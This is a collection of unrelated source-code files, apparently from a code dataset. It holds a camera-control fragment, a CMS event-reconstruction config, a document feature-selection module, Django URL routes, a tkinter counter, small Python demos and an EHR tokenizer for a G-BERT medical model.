Disarm the camera by stopping the capture engine and cleaning up frames.
"""
# among other things this prevents callback from requeuing frames
self._is_armed = False
# automatically stop acquisition if required
self.stop_frame_acquisition()
# clean up
self.end_capture()
self.flush_capture_queue()
self.revoke_all_frames()
self._frame_buffer = ()
# encourage garbage collection of frame buffer memory
gc.collect()
def load_settings(self, filepath, iterations) -> None:
"""
Load settings from XML
"""
vmb_persist_settings = vimba_c.VimbaFeaturePersistSettings()
vmb_persist_settings.persistType = 2 # all apart from LUT, default option
vmb_persist_settings.maxIterations = iterations
error = vimba_c.vmb_camera_settings_load(self._handle,
filepath.encode(),
byref(vmb_persist_settings),
sizeof(vmb_persist_settings))
if error:
raise VimbaException(error)
def save_settings(self, filepath, iterations) -> None:
"""
Save settings to XML
"""
vmb_persist_settings = vimba_c.VimbaFeaturePersistSettings()
vmb_persist_settings.persistType = 2 # all apart from LUT, default option
vmb_persist_settings.maxIterations = iterations
error = vimba_c.vmb_camera_settings_save(self._handle,
filepath.encode(),
byref(vmb_persist_settings),
sizeof(vmb_persist_settings))
if error:
raise VimbaException(error)
|
1697801
|
import FWCore.ParameterSet.Config as cms
process = cms.Process('RERECO')
# this is to avoid the postpathendrun probem with same process name (only with http reader)
process.options = cms.untracked.PSet(
IgnoreCompletely = cms.untracked.vstring('Configuration')
# SkipEvent = cms.untracked.vstring('Configuration')
)
# for ispy
process.add_(
cms.Service("ISpyService",
outputFileName = cms.untracked.string('Ispy.ig'),
outputMaxEvents = cms.untracked.int32 (1000),
online = cms.untracked.bool(True),
debug = cms.untracked.bool(True)
)
)
# import of standard configurations
process.load('Configuration/StandardSequences/Services_cff')
process.load('FWCore/MessageService/MessageLogger_cfi')
process.load('Configuration/StandardSequences/GeometryIdeal_cff')
process.load('Configuration/StandardSequences/MagneticField_AutoFromDBCurrent_cff')
process.load('Configuration/StandardSequences/RawToDigi_Data_cff')
process.load('Configuration/StandardSequences/Reconstruction_cff')
process.load('DQMOffline/Configuration/DQMOffline_cff')
process.load('Configuration/StandardSequences/EndOfProcess_cff')
process.load('Configuration/StandardSequences/FrontierConditions_GlobalTag_cff')
process.load('Configuration/EventContent/EventContent_cff')
process.load('ISpy/Analyzers/ISpy_Producer_cff')
######### FILTERING Section #############################
# this is for filtering on HLT path
process.hltHighLevel = cms.EDFilter("HLTHighLevel",
TriggerResultsTag = cms.InputTag("TriggerResults","","HLT"),
# HLTPaths = cms.vstring('HLT_Activity_L1A'), # provide list of HLT paths (or patterns) you want
HLTPaths = cms.vstring('HLT_MinBiasBSC'), # provide list of HLT paths (or patterns) you want
eventSetupPathsKey = cms.string(''), # not empty => use read paths from AlCaRecoTriggerBitsRcd via this key
andOr = cms.bool(True), # how to deal with multiple triggers: True (OR) accept if ANY is true, False (AND) accept if ALL are true
throw = cms.bool(True), # throw exception on unknown path names
saveTags = cms.bool(False)
)
# this is for filtering based on reco variables
process.skimming = cms.EDFilter("BeamSplash",
energycuttot = cms.untracked.double(1000.0),
energycutecal = cms.untracked.double(700.0),
energycuthcal = cms.untracked.double(700.0),
ebrechitcollection = cms.InputTag("ecalRecHit","EcalRecHitsEB"),
eerechitcollection = cms.InputTag("ecalRecHit","EcalRecHitsEE"),
hbherechitcollection = cms.InputTag("hbhereco"),
applyfilter = cms.untracked.bool(False)
)
# this is for filtering on trigger type
process.load("HLTrigger.special.HLTTriggerTypeFilter_cfi")
# 0=random, 1=physics, 2=calibration, 3=technical
process.hltTriggerTypeFilter.SelectedTriggerType = 1
# this is for filtering on L1 technical trigger bit
process.load('L1TriggerConfig.L1GtConfigProducers.L1GtTriggerMaskTechTrigConfig_cff')
process.load('HLTrigger/HLTfilters/hltLevel1GTSeed_cfi')
process.hltLevel1GTSeed.L1TechTriggerSeeding = cms.bool(True)
process.hltLevel1GTSeed.L1SeedsLogicalExpression = cms.string('32 OR 33 OR 40 OR 41')
#this is for filtering/tagging PhysDecl bit
process.physdecl = cms.EDFilter("PhysDecl",
applyfilter = cms.untracked.bool(False),
debugOn = cms.untracked.bool(True)
)
process.configurationMetadata = cms.untracked.PSet(
version = cms.untracked.string('$Revision: 1.2 $'),
annotation = cms.untracked.string('promptReco nevts:1'),
name = cms.untracked.string('PyReleaseValidation')
)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(NUMEVENTS)
)
process.options = cms.untracked.PSet(
Rethrow = cms.untracked.vstring('ProductNotFound'),
wantSummary = cms.untracked.bool(True)
)
process.source = cms.Source("EventStreamHttpReader",
# streaming##################################################
# in p5
# sourceURL = cms.string('http://srv-c2d05-14.cms:22100/urn:xdaq-application:lid=30'),
# consumerName = cms.untracked.string('DQM Source'),
# tunnel to proxy
# THIS SHOULD BE THE CORRECT FOR OFFLINE ACCESSING THE REVERSE PROXY
# sourceURL = cms.string('http://cmsdaq0.cern.ch/event-server/urn:xdaq-application:lid=30'),
# special tunnel configuration, need to setup an external tunnel
# sourceURL = cms.string('http://localhost:22100/urn:xdaq-application:lid=30'),
sourceURL = SOURCE,
consumerName = cms.untracked.string('Event Display'),
# direct storage manager
# sourceURL = cms.string('http://localhost:22100/urn:xdaq-application:service=storagemanager'),
# consumerName = cms.untracked.string('Event Display'),
# playback###################################################
# in pt5
# sourceURL = cms.string('http://srv-c2d05-05:50082/urn:xdaq-application:lid=29'),
# tunnel
# sourceURL = cms.string('http://localhost:50082/urn:xdaq-application:lid=29'),
# consumerName = cms.untracked.string('Playback Source'),
#################################################################
consumerPriority = cms.untracked.string('normal'),
max_event_size = cms.int32(7000000),
SelectHLTOutput = SELECTHLT,
# SelectHLTOutput = cms.untracked.string('hltOutputDQM'),
# SelectHLTOutput = cms.untracked.string('hltOutputExpress'),
max_queue_depth = cms.int32(5),
maxEventRequestRate = cms.untracked.double(2.0),
SelectEvents = cms.untracked.PSet(
# SelectEvents = cms.vstring('*DQM')
SelectEvents = cms.vstring('*')
# SelectEvents = cms.vstring('PhysicsPath')
),
headerRetryInterval = cms.untracked.int32(3)
)
#process.source = cms.Source("PoolSource",
# debugVerbosity = cms.untracked.uint32(0),
# debugFlag = cms.untracked.bool(False),
# fileNames = cms.untracked.vstring(
##'/store/data/Commissioning08/BeamHalo/RECO/StuffAlmostToP5_v1/000/061/642/10A0FE34-A67D-DD11-AD05-000423D94E1C.root'
##
##'/store/express/CRAFT09/ExpressMuon/FEVT/v1/000/110/835/FED0EFCD-AB87-DE11-9B72-000423D99658.root'
##'/store/express/CRAFT09/ExpressMuon/FEVT/v1/000/110/835/FC629BD2-CF87-DE11-9077-001D09F25438.root',
##'/store/express/CRAFT09/ExpressMuon/FEVT/v1/000/110/835/FC38EE75-BD87-DE11-822A-001D09F253C0.root',
##'/store/express/CRAFT09/ExpressMuon/FEVT/v1/000/110/835/FC1CB101-A487-DE11-9F10-000423D99660.root'
#))
process.FEVT = cms.OutputModule("PoolOutputModule",
maxSize = cms.untracked.int32(1000),
fileName = cms.untracked.string('EVDISPSM_DIR/EVDISPSM_SUFFIX.root'),
outputCommands = cms.untracked.vstring('keep *','drop *_MEtoEDMConverter_*_*'),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('RAW-RECO'),
# filterName = cms.untracked.string(''))
filterName = cms.untracked.string('EVDISP')),
SelectEvents = cms.untracked.PSet(
SelectEvents = cms.vstring('fullpath')
)
)
# Other statements
#process.GlobalTag.connect = 'sqlite_file:/afs/cern.ch/user/m/malgeri/public/gtfirstcoll.db'
process.GlobalTag.globaltag = 'GR10_P_V2::All'
process.fifthCkfTrajectoryFilter.filterPset.minimumNumberOfHits = 2
process.fifthCkfTrajectoryFilter.filterPset.maxLostHits = 4
process.fifthCkfTrajectoryFilter.filterPset.maxConsecLostHits = 2
process.fifthCkfInOutTrajectoryFilter.filterPset.minimumNumberOfHits = 2
process.fifthCkfInOutTrajectoryFilter.filterPset.maxLostHits = 4
process.fifthCkfInOutTrajectoryFilter.filterPset.maxConsecLostHits = 2
process.fifthCkfTrajectoryBuilder.minNrOfHitsForRebuild = 2
process.fifthRKTrajectorySmoother.minHits = 2
process.fifthRKTrajectoryFitter.minHits = 2
process.fifthFittingSmootherWithOutlierRejection.MinNumberOfHits = 2
process.tobtecStepLoose.minNumberLayers = 2
process.tobtecStepLoose.maxNumberLostLayers = 2
process.tobtecStepLoose.dz_par1 = cms.vdouble(10.5, 4.0)
process.tobtecStepLoose.dz_par2 = cms.vdouble(10.5, 4.0)
process.tobtecStepLoose.d0_par1 = cms.vdouble(10.5, 4.0)
process.tobtecStepLoose.d0_par2 = cms.vdouble(10.5, 4.0)
process.tobtecStepLoose.chi2n_par = cms.double(100.0)
process.fifthSeeds.RegionFactoryPSet.RegionPSet.originHalfLength = 100
process.fifthSeeds.RegionFactoryPSet.RegionPSet.originRadius = 10
process.Chi2MeasurementEstimator.MaxChi2 = 100
# to filter on MinBias...
#process.fullpath = cms.Path(process.hltTriggerTypeFilter+process.hltHighLevel+process.RawToDigi+process.reconstruction)
# to filter on trigger type only
#process.fullpath = cms.Path(process.hltTriggerTypeFilter+process.hltHighLevel+process.RawToDigi+process.reconstruction)
#process.fullpath = cms.Path(process.RawToDigi+process.reconstruction+process.skimming+process.iSpy_sequence)
#process.fullpath = cms.Path(process.hltTriggerTypeFilter+process.RawToDigi+process.reconstruction+process.skimming+process.iSpy_sequence)
# added physdecl in tagging mode to catch physdeclared bit in log files
# process.fullpath = cms.Path(process.hltTriggerTypeFilter+process.RawToDigi+process.physdecl+process.reconstruction+process.skimming+process.iSpy_sequence)
process.fullpath = cms.Path(process.RawToDigi+process.physdecl+process.reconstruction+process.skimming+process.iSpy_sequence)
process.out_step = cms.EndPath(process.FEVT)
# Schedule definition
process.schedule = cms.Schedule(process.fullpath,process.out_step)
#process.e = cms.EndPath(process.out)
|
1697809
|
from typing import Dict, List, Tuple, Union, Any, TypeVar
from scipy.sparse.csr import csr_matrix
from numpy import memmap
from sqlitedict import SqliteDict
from tempfile import mkdtemp
from DocumentFeatureSelection.init_logger import logger
from numpy import ndarray, int32, int64
import pickle
import json
import csv
import os
import shutil
# this class is from https://code.activestate.com/recipes/576642/
class PersistentDict(dict):
''' Persistent dictionary with an API compatible with shelve and anydbm.
The dict is kept in memory, so the dictionary operations run as fast as
a regular dictionary.
Write to disk is delayed until close or sync (similar to gdbm's fast mode).
Input file format is automatically discovered.
Output file format is selectable between pickle, json, and csv.
All three serialization formats are backed by fast C implementations.
'''
def __init__(self, filename, flag='c', mode=None, format='pickle', *args, **kwds):
self.flag = flag # r=readonly, c=create, or n=new
self.mode = mode # None or an octal triple like 0644
self.format = format # 'csv', 'json', or 'pickle'
self.filename = filename
if flag != 'n' and os.access(filename, os.R_OK):
fileobj = open(filename, 'rb' if format=='pickle' else 'r')
with fileobj:
self.load(fileobj)
dict.__init__(self, *args, **kwds)
def sync(self):
'Write dict to disk'
if self.flag == 'r':
return
filename = self.filename
tempname = filename + '.tmp'
fileobj = open(tempname, 'wb' if self.format=='pickle' else 'w')
try:
self.dump(fileobj)
except Exception:
os.remove(tempname)
raise
finally:
fileobj.close()
shutil.move(tempname, self.filename) # atomic commit
if self.mode is not None:
os.chmod(self.filename, self.mode)
def close(self):
self.sync()
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
def dump(self, fileobj):
if self.format == 'csv':
csv.writer(fileobj).writerows(self.items())
elif self.format == 'json':
json.dump(self, fileobj, separators=(',', ':'))
elif self.format == 'pickle':
pickle.dump(dict(self), fileobj, 2)
else:
raise NotImplementedError('Unknown format: ' + repr(self.format))
def load(self, fileobj):
# try formats from most restrictive to least restrictive
for loader in (pickle.load, json.load, csv.reader):
fileobj.seek(0)
try:
return self.update(loader(fileobj))
except Exception:
pass
raise ValueError('File not in a supported format')
class SetDocumentInformation(object):
__slots__ = ['matrix_object', 'label2id', 'feature2id']
def __init__(self, dict_matrix_index:Union[Dict[str,Any], SqliteDict, PersistentDict]):
"""
* Keys
- matrix_object:Union[csr_matrix, ndarray]
- label2id: Dict[str, str]
- feature2id: Dict[str, str]
"""
if not "matrix_object" in dict_matrix_index:
raise Exception("dict_matrix_index must have key='matrix_object'")
if not "label2id" in dict_matrix_index:
raise Exception("dict_matrix_index must have key='label2id'")
if not "feature2id" in dict_matrix_index:
raise Exception("dict_matrix_index must have key='feature2id'")
self.matrix_object = dict_matrix_index['matrix_object']
self.label2id = dict_matrix_index['label2id']
self.feature2id = dict_matrix_index['feature2id']
if isinstance(dict_matrix_index, dict):
pass
elif isinstance(dict_matrix_index, PersistentDict):
dict_matrix_index.sync()
elif isinstance(dict_matrix_index, SqliteDict):
dict_matrix_index.sync()
else:
raise Exception()
class DataCsrMatrix(object):
"""* What you can do
- You can keep information for keeping matrix object.
"""
__slots__ = ['cache_backend', 'csr_matrix_',
'label2id_dict', 'vocabulary',
'n_docs_distribution', 'n_term_freq_distribution', 'path_working_dir']
def __init__(self,
csr_matrix_: csr_matrix,
label2id_dict: Dict[str, int],
vocabulary: Dict[str, int],
n_docs_distribution: ndarray,
n_term_freq_distribution: ndarray,
is_use_cache: bool=False,
is_use_memmap: bool=False,
cache_backend: str='PersistentDict',
path_working_dir: str=None):
"""* Parameters
-----------------
- csr_matrix_: Matrix object which saves term frequency or document frequency
- label2id_dict: Dict object whose key is label-name, value is row-index of the given matrix.
>>> {'label_b': 0, 'label_c': 1, 'label_a': 2}
- vocabulary: Dict object whose key is feature-name, value is column-index of the given matrix.
>>> {'label_b': 0, 'label_c': 1, 'label_a': 2}
- n_docs_distribution: Sequence object(list,ndarray). It saves a distribution of N(docs) in each label.
- n_term_freq_distribution: Sequence object(list,ndarray). It saves a distribution of N(all terms) in each label.
- is_use_cache: boolean. It True; the matrix object is saved on the disk. It saves memory of your machine.
- is_use_memmap: boolean. It True; the matrix object is saved on the disk. It saves memory of your machine.
- cache_backend: str. {PersistentDict, SqliteDict}, backend to save this object on the disk.
- path_working_dir: str. Path to save temporary cache objects.
"""
self.n_docs_distribution = n_docs_distribution
self.n_term_freq_distribution = n_term_freq_distribution
self.cache_backend = cache_backend
if (is_use_memmap or is_use_cache) and path_working_dir is None:
self.path_working_dir = mkdtemp()
logger.info("Temporary files are at {}".format(self.path_working_dir))
else:
self.path_working_dir = path_working_dir
if is_use_cache:
"""You use disk-drive for keeping object.
"""
path_vocabulary_cache_obj = os.path.join(self.path_working_dir, 'vocabulary.cache')
path_label_2_dict_cache_obj = os.path.join(self.path_working_dir, 'label_2_dict.cache')
self.vocabulary = self.initialize_cache_dict_object(path_vocabulary_cache_obj)
self.vocabulary = vocabulary
self.label2id_dict = self.initialize_cache_dict_object(path_label_2_dict_cache_obj)
logger.info("Now saving into local file...")
for k, v in label2id_dict.items():
self.label2id_dict[k] = v
if isinstance(self.label2id_dict, PersistentDict):
self.label2id_dict.sync()
else:
"""Keep everything on memory
"""
self.label2id_dict = label2id_dict
self.vocabulary = vocabulary
if is_use_memmap:
"""You use disk-drive for keeping object
"""
path_memmap_obj = os.path.join(self.path_working_dir, 'matrix.memmap')
self.csr_matrix_ = self.initialize_memmap_object(csr_matrix_, path_memmap_object=path_memmap_obj)
else:
self.csr_matrix_ = csr_matrix_
def initialize_cache_dict_object(self, path_cache_file):
if self.cache_backend == 'PersistentDict':
return PersistentDict(path_cache_file, flag='c', format='json')
elif self.cache_backend == 'SqliteDict':
return SqliteDict(path_cache_file, autocommit=True)
else:
raise Exception('No such cache_backend option named {}'.format(self.cache_backend))
def initialize_memmap_object(self, matrix_object: csr_matrix, path_memmap_object: str)->memmap:
fp = memmap(path_memmap_object, dtype='float64', mode='w+', shape=matrix_object.shape)
fp[:] = matrix_object.todense()[:]
return fp
def __str__(self):
return """matrix-type={}, matrix-size={}, path_working_dir={}""".format(type(self.csr_matrix_),
self.csr_matrix_.shape,
self.path_working_dir)
class ROW_COL_VAL(object):
"""Data class to keep value of one item in CSR-matrix"""
__slots__ = ('row', 'col', 'val')
def __init__(self, row: int, col:int, val:int):
self.row = row
self.col = col
self.val = val
class ScoredResultObject(object):
""""""
def __init__(self,
scored_matrix:csr_matrix,
label2id_dict:Union[Dict[str,Any], ndarray],
feature2id_dict=Union[Dict[str,Any], ndarray],
method:str=None,
matrix_form:str=None,
frequency_matrix:csr_matrix=None):
"""*Parameters
------------
- scored_matrix: Matrix object which saves result of feature-extraction
- label2id_dict: Dict object whose key is label-name, value is row-index of the matrix.
- feature2id_dict: Dict object whose key is feature-name, value is column-index of the matrix.
- method: a name of feature-extraction method.
- matrix_form: a type of the given matrix for feature-extraction computation. {term_freq, doc_freq}
- frequency_matrix: Matrix object(term-frequency or document-frequency). The matrix is data-source of feature-extraction computation.
"""
self.scored_matrix = scored_matrix
self.label2id_dict = label2id_dict
self.feature2id_dict = feature2id_dict
self.method = method
self.matrix_form = matrix_form
self.frequency_matrix = frequency_matrix
# For keeping old version
self.ScoreMatrix2ScoreDictionary = self.convert_score_matrix2score_record
def __conv_into_dict_format(self, word_score_items):
out_format_structure = {}
for item in word_score_items:
if item['label'] not in out_format_structure :
out_format_structure[item['label']] = [{'feature': item['word'], 'score': item['score']}]
else:
out_format_structure[item['label']].append({'feature': item['word'], 'score': item['score']})
return out_format_structure
def convert_score_matrix2score_record(self,
outformat:str='items',
sort_desc:bool=True):
"""* What you can do
- Get dictionary structure from weighted-featured scores.
- You can choose 'dict' or 'items' for ```outformat``` parameter.
* Output
---------------------
- If outformat='dict', you get
>>> {label_name:{feature: score}}
Else if outformat='items', you get
>>> [{feature: score}]
"""
scored_objects = self.get_feature_dictionary(
weighted_matrix=self.scored_matrix,
vocabulary=self.feature2id_dict,
label_group_dict=self.label2id_dict,
frequency_matrix=self.frequency_matrix
)
if sort_desc: scored_objects = \
sorted(scored_objects, key=lambda x: x['score'], reverse=True)
if outformat=='dict':
out_format_structure = self.__conv_into_dict_format(scored_objects)
elif outformat=='items':
out_format_structure = scored_objects
else:
raise ValueError('outformat must be either of {dict, items}')
return out_format_structure
def __get_value_index(self, row_index, column_index, weight_csr_matrix, verbose=False):
assert isinstance(row_index, (int, int32, int64))
assert isinstance(column_index, (int, int32, int64))
assert isinstance(weight_csr_matrix, (ndarray,csr_matrix))
value = weight_csr_matrix[row_index, column_index]
return value
def make_non_zero_information(self, weight_csr_matrix: csr_matrix)->List[ROW_COL_VAL]:
"""Construct Tuple of matrix value. Return value is array of ROW_COL_VAL namedtuple.
:param weight_csr_matrix:
:return:
"""
assert isinstance(weight_csr_matrix, (csr_matrix, ndarray))
row_col_index_array = weight_csr_matrix.nonzero()
row_indexes = row_col_index_array[0]
column_indexes = row_col_index_array[1]
assert len(row_indexes) == len(column_indexes)
value_index_items = [None] * len(row_indexes) # type: List[ROW_COL_VAL]
for i in range(0, len(row_indexes)):
value_index_items[i] = ROW_COL_VAL(row_indexes[i],
column_indexes[i],
self.__get_value_index(row_indexes[i], column_indexes[i], weight_csr_matrix))
return value_index_items
def SUB_FUNC_feature_extraction(self,
weight_row_col_val_obj: ROW_COL_VAL,
dict_index_information: Dict[str, Dict[str, str]],
dict_position2value: Dict[Tuple[int, int], float]=None)->Dict[str, Any]:
"""This function returns weighted score between label and words.
Input csr matrix must be 'document-frequency' matrix, where records #document that word appears in document set.
[NOTE] This is not TERM-FREQUENCY.
For example,
If 'iPhone' appears in 5 documents of 'IT' category document set, value must be 5.
Even if 10 'iPhone' words in 'IT' category document set, value is still 5.
"""
assert isinstance(weight_row_col_val_obj, ROW_COL_VAL)
feature_score_record = {
'score': weight_row_col_val_obj.val,
'label': self.get_label(weight_row_col_val_obj, dict_index_information['id2label']),
'feature': self.get_word(weight_row_col_val_obj, dict_index_information['id2vocab'])
}
if not dict_position2value is None:
if (weight_row_col_val_obj.col,weight_row_col_val_obj.row) in dict_position2value:
frequency = dict_position2value[tuple([weight_row_col_val_obj.col,weight_row_col_val_obj.row])]
else:
"""When a feature-extraction method is BNS, frequency=0 is possible."""
frequency = 0
feature_score_record.update({"frequency": frequency})
return feature_score_record
def get_feature_dictionary(self,
weighted_matrix: csr_matrix,
vocabulary:Dict[str, int],
label_group_dict:Dict[str, int],
cache_backend: str = 'PersistentDict',
is_use_cache: bool=True,
frequency_matrix: csr_matrix=None)->List[Dict[str, Any]]:
"""* What you can do
- Get dictionary structure from weighted-featured scores.
"""
assert isinstance(weighted_matrix, csr_matrix)
assert isinstance(vocabulary, dict)
assert isinstance(label_group_dict, dict)
logger.debug(msg='Start making scored dictionary object from scored matrix')
logger.debug(msg='Input matrix size= {} * {}'.format(weighted_matrix.shape[0], weighted_matrix.shape[1]))
weight_value_index_items = self.make_non_zero_information(weighted_matrix)
if not frequency_matrix is None:
frequency_value_index_items = self.make_non_zero_information(frequency_matrix)
dict_position2value = {(t_col_row.col,t_col_row.row): t_col_row.val for t_col_row in frequency_value_index_items}
else:
dict_position2value = None
if is_use_cache:
dict_index_information = self.initialize_cache_dict_object(cache_backend, file_name='dict_index_information')
else:
dict_index_information = {}
dict_index_information['id2label'] = {value:key for key, value in label_group_dict.items()}
dict_index_information['id2vocab'] = {value:key for key, value in vocabulary.items()}
if isinstance(dict_index_information, SqliteDict):
dict_index_information.commit()
elif isinstance(dict_index_information, PersistentDict):
dict_index_information.sync()
else:
pass
# TODO may be this func takes too much time. consider cython.
seq_score_objects = [None] * len(weight_value_index_items) # type: List[Dict[str,Any]]
for i, weight_row_col_val_tuple in enumerate(weight_value_index_items):
seq_score_objects[i] = self.SUB_FUNC_feature_extraction(
weight_row_col_val_tuple,
dict_index_information,
dict_position2value)
logger.debug(msg='Finished making scored dictionary')
return seq_score_objects
def get_label(self, row_col_val_tuple, label_id)->str:
assert isinstance(row_col_val_tuple, ROW_COL_VAL)
assert isinstance(label_id, dict)
label = label_id[row_col_val_tuple.row]
return label
def get_word(self, row_col_val_tuple:ROW_COL_VAL, vocabulary:Dict[int,str])->Union[str,List[str],Tuple[str,...]]:
"""* what u can do
- It gets feature name from the given matrix object.
- A feature is json serialized, thus this method tries to de-serialize json string into python object.
- Original feature object is possibly string(word), list of str, list of str.
"""
assert isinstance(row_col_val_tuple, ROW_COL_VAL)
assert isinstance(vocabulary, dict)
vocab = vocabulary[row_col_val_tuple.col]
try:
feature_object = json.loads(vocab)
if len(feature_object)==1:
# When feature is word, the length is 1 #
feature_object = feature_object[0]
except:
feature_object = vocab
return feature_object
def initialize_cache_dict_object(self, cache_backend:str, file_name:str, path_cache_file=mkdtemp()):
if cache_backend == 'PersistentDict':
return PersistentDict(os.path.join(path_cache_file, file_name), flag='c', format='json')
elif cache_backend == 'SqliteDict':
return SqliteDict(os.path.join(path_cache_file, file_name), autocommit=True)
else:
raise Exception('No such cache_backend option named {}'.format(cache_backend))
FeatureType = TypeVar('T', str, Tuple[Any])
AvailableInputTypes = TypeVar('T', PersistentDict,
SqliteDict,
Dict[str,List[List[Union[str,Tuple[Any]]]]])
|
1697811
|
personas = int(input("¿Cuantas personas hay en su grupo de cena?"))
if personas > 8:
print("Tendran que esperar una mesa")
else:
print("Su mesa esta lista")
|
1697821
|
from django.conf.urls.defaults import *
urlpatterns = patterns('saved_searches.views',
url(r'^most_recent/$', 'most_recent', name='saved_searches_most_recent'),
url(r'^most_recent/username/(?P<username>[\w\d._-]+)/$', 'most_recent', name='saved_searches_most_recent_by_user'),
url(r'^most_recent/area/(?P<search_key>[\w\d._-]*)/$', 'most_recent', name='saved_searches_most_recent_by_search_key'),
url(r'^most_recent/area/(?P<search_key>[\w\d._-]*)/username/(?P<username>[\w\d._-]+)/$', 'most_recent', name='saved_searches_most_recent_by_user_search_key'),
url(r'^most_popular/$', 'most_popular', name='saved_searches_most_popular'),
url(r'^most_popular/username/(?P<username>[\w\d._-]+)/$', 'most_popular', name='saved_searches_most_popular_by_user'),
url(r'^most_popular/area/(?P<search_key>[\w\d._-]*)/$', 'most_popular', name='saved_searches_most_popular_by_search_key'),
url(r'^most_popular/area/(?P<search_key>[\w\d._-]*)/username/(?P<username>[\w\d._-]+)/$', 'most_popular', name='saved_searches_most_popular_by_user_search_key'),
)
|
1697848
|
from typing import Any, Dict
from sovereign.sources.lib import Source
from sovereign.config_loader import Loadable
class File(Source):
def __init__(self, config: Dict[str, Any], scope: str = "default"):
super(File, self).__init__(config, scope)
try:
self.path = Loadable.from_legacy_fmt(config["path"])
except KeyError:
try:
self.path = Loadable(**config["spec"])
except KeyError:
raise KeyError('File source needs to specify "spec" within config')
def get(self) -> Any:
"""
Uses the file config loader to load the given path
"""
return self.path.load()
|
1697856
|
import json
import os
import typing
from pathlib import Path
import reseval
###############################################################################
# Get subjective evaluation results
###############################################################################
def results(
name: str,
directory: typing.Union[str, bytes, os.PathLike] = Path()) -> dict:
"""Get the results of a subjective evaluation
Args:
name: The name of the subjective evaluation to retrieve results for
directory: The directory to save results
Returns:
dict: Evaluation results
"""
# Download and save crowdsource results
crowdsource = reseval.crowdsource.assignments(name)
crowdsource_file = directory / name / 'crowdsource' / 'crowdsource.json'
crowdsource_file.parent.mkdir(exist_ok=True, parents=True)
with open(crowdsource_file, 'w') as file:
json.dump(crowdsource, file, indent=4, default=str)
# Download database tables
reseval.database.download(
name,
reseval.EVALUATION_DIRECTORY / name / 'tables')
if directory is not None:
reseval.database.download(name, directory / name / 'tables')
# Load responses
config = reseval.load.config_by_name(name)
conditions = reseval.load.conditions(name)
responses = reseval.load.responses(name)
# No responses yet
if len(responses) == 0:
results = {'samples': 0, 'conditions': {}}
# Save results
with open(directory / name / 'results.json', 'w') as file:
json.dump(results, file, indent=4)
return results
# Get condition names
conditions = [condition['Condition'] for condition in conditions]
# Group results by file stems
responses_by_stem = {}
for response in responses:
stem = response['Stem']
if stem in responses_by_stem:
responses_by_stem[stem].append(response['Response'])
else:
responses_by_stem[stem] = [response['Response']]
# Get test
test = reseval.test.get(config)
# Analyze results
analysis, stem_scores = test.analyze(
conditions,
responses_by_stem,
config['random_seed'])
# Save results
with open(directory / name / 'results.json', 'w') as file:
json.dump(analysis | {'stems': stem_scores}, file, indent=4)
return analysis
|
1697892
|
import tkinter as tk
count=0
def reset():
global count
count=0
def EXIT():
window.destroy()
def counter():
global count
if(count>=10 and count<20):
label2.config(text=str(count),fg='green')
elif(count>=20):
label2.config(text=str(count),fg='red2')
btn1.config()
label2.config(text=str(count))
count+=1
window.after(1000,counter) #1000ms
window=tk.Tk()
label1=tk.Label(window,text='COUNTER POWERD BY TK',bg='red2',fg='white',font='HELVITICA 20 bold')
label2=tk.Label(window,text=str(count),bg='white',fg='black',font='HELVITICA 30 bold')
label1.pack()#pack for auto positioning
label2.pack()
btn1=tk.Button(window,text='RESET',font='HELVITICA 15 bold',bg='green',command=reset)
btn2=tk.Button(window,text='EXIT',font='HELVITICA 15 bold',bg='red2',command=EXIT)
btn1.pack()
btn2.pack()
counter()
|
1697921
|
class BaseClass:
"""Simple BaseClass with a name."""
def __init__(self, name: str):
self.name = name
def say_hi(self):
print(f"I'm {self.name} of type {type(self)}")
def short_desc(self) -> str:
return f"BaseClass({self.name})"
class ChildClass(BaseClass):
"""Simple child class inheriting from BaseClass."""
def short_desc(self) -> str:
return "Child of " + super().short_desc()
class SecondBaseClass:
"""Simple BaseClass with a name."""
def say_ho(self) -> str:
return f"I don't have a name, but the type {type(self)}."
def short_desc(self) -> str:
return "SecondBaseClass()"
class DoubleChildClass(BaseClass, SecondBaseClass):
"""Simple child class inheriting from BaseClass and SecondBaseClass."""
def short_desc(self) -> str:
return "Child of " + super().short_desc()
class A:
pass
class B:
pass
class C(A, B):
pass
class D(A, B):
pass
class E(C, D):
pass
class F(A, B):
pass
class G(A, B):
pass
class H(F, G):
pass
class I(E, H): # noqa: 742
pass
|
1697975
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import os
import logging
import argparse
import random
from tqdm import tqdm, trange
import dill
from collections import defaultdict
import numpy as np
import pandas as pd
import torch
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler, Dataset
from torch.utils.data.distributed import DistributedSampler
from torch.optim import Adam
from tensorboardX import SummaryWriter
from utils import metric_report, t2n, get_n_params
from config import BertConfig
from predictive_models import GBERT_Predict_Side
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO)
logger = logging.getLogger(__name__)
class Voc(object):
def __init__(self):
self.idx2word = {}
self.word2idx = {}
def add_sentence(self, sentence):
for word in sentence:
if word not in self.word2idx:
self.idx2word[len(self.word2idx)] = word
self.word2idx[word] = len(self.word2idx)
class EHRTokenizer(object):
"""Runs end-to-end tokenization"""
def __init__(self, data_dir, special_tokens=("[PAD]", "[CLS]", "[MASK]")):
self.vocab = Voc()
# special tokens
self.vocab.add_sentence(special_tokens)
self.rx_voc = self.add_vocab(os.path.join(data_dir, 'rx-vocab.txt'))
self.dx_voc = self.add_vocab(os.path.join(data_dir, 'dx-vocab.txt'))
# code only in multi-visit data
self.rx_voc_multi = Voc()
self.dx_voc_multi = Voc()
with open(os.path.join(data_dir, 'rx-vocab-multi.txt'), 'r') as fin:
for code in fin:
self.rx_voc_multi.add_sentence([code.rstrip('\n')])
with open(os.path.join(data_dir, 'dx-vocab-multi.txt'), 'r') as fin:
for code in fin:
self.dx_voc_multi.add_sentence([code.rstrip('\n')])
def add_vocab(self, vocab_file):
voc = self.vocab
specific_voc = Voc()
with open(vocab_file, 'r') as fin:
for code in fin:
voc.add_sentence([code.rstrip('\n')])
specific_voc.add_sentence([code.rstrip('\n')])
return specific_voc
def convert_tokens_to_ids(self, tokens):
"""Converts a sequence of tokens into ids using the vocab."""
ids = []
for token in tokens:
ids.append(self.vocab.word2idx[token])
return ids
def convert_ids_to_tokens(self, ids):
"""Converts a sequence of ids in wordpiece tokens using the vocab."""
tokens = []
for i in ids:
tokens.append(self.vocab.idx2word[i])
